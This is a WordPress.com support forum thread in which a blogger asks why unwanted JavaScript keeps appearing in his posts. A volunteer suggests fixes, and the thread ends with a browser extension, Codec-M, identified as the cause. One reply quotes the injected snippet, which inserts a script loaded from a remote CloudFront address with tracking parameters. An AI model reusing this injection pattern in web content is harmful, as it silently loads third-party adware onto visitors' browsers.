unwanted code

  • Author
    Posts
  • #867376

    Can’t get rid of a block of code showing up in the post.

    The blog I need help with is hikingplotterkill.wordpress.com.

    #867454

    timethief
    Member

    There is no blog linked to your username. Exactly which blog and which post are you referring to? Please post an active link starting with http:// to the post you are referring to so we can examine it.

    #867472

    Hi thanks for answering, I thought the url ID was automatic.
    http://hikingplotterkill.wordpress.com/
    is the problem blog. It shows up in the latest post as this:

    // -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
    // ]]>

    #867477

    timethief
    Member

    We Volunteers cannot see the URL people choose when creating threads. That is a JavaScript code and we cannot use JavaScript on free hosted WordPress.com blogs for security reasons. The software will continue to strip the code so it’s not active.

    You can edit the post and remove the code. As you refer to the code as “unwanted” I’m wondering if you have been copying and pasting text from elsewhere without using either icon 5 or icon 6 in Row 2 of the visual editor, please see here http://en.support.wordpress.com/visual-editor/#pasting-text

    Go to Settings > Writing and select “ ___ WordPress should correct invalidly nested XHTML automatically” and then scroll down and click “Save Changes.”

    Posts > All Posts, change all your latest posts to Draft, click Update, change them back to Published, click Update again. (You can edit all of them at once: tick the square in front of their titles then select Edit from the Bulk Actions dropdown and click Apply.)

    #867488

    Timethief,
    I suspected copy-and-paste and have been keying everything in by hand.

    I clicked the settings box by ‘WordPress should correct invalidly nested XHTML automatically.’

    Then I threw out the post and made a new one. I made a couple of edits, every time I hit the publish button I get another batch of code on the blog. At the moment there are three.

    There is one other strange thing that may be a hint. Whenever I leave the dashboard to go to the blog I get a “are you sure you want to leave this page” prompt. That didn’t used to happen.
    thanks,
    Ed

    #867489

    One other thing that’s different is “text enhance” showing up as a link on the words ‘south rim.’ I don’t know what that is, where it comes from, how to get rid of it.
    thanks,
    Ed

    #867665

    I figured out how to opt out on the TextEnhance.

    But the unwanted code still shows up. I can delete it but when I hit the update button it reappears.

    #867672

    timethief
    Member
    #867673

    timethief
    Member

    I think it may be a case of a browser add-on doing this. Try disabling all browser addons and see if that happens when they aren’t activated.

    #867674

    Hi again,
    I got rid of the Codec-M extension and the problem disappeared.
    Thanks again for helping me out!

The topic ‘unwanted code’ is closed to new replies.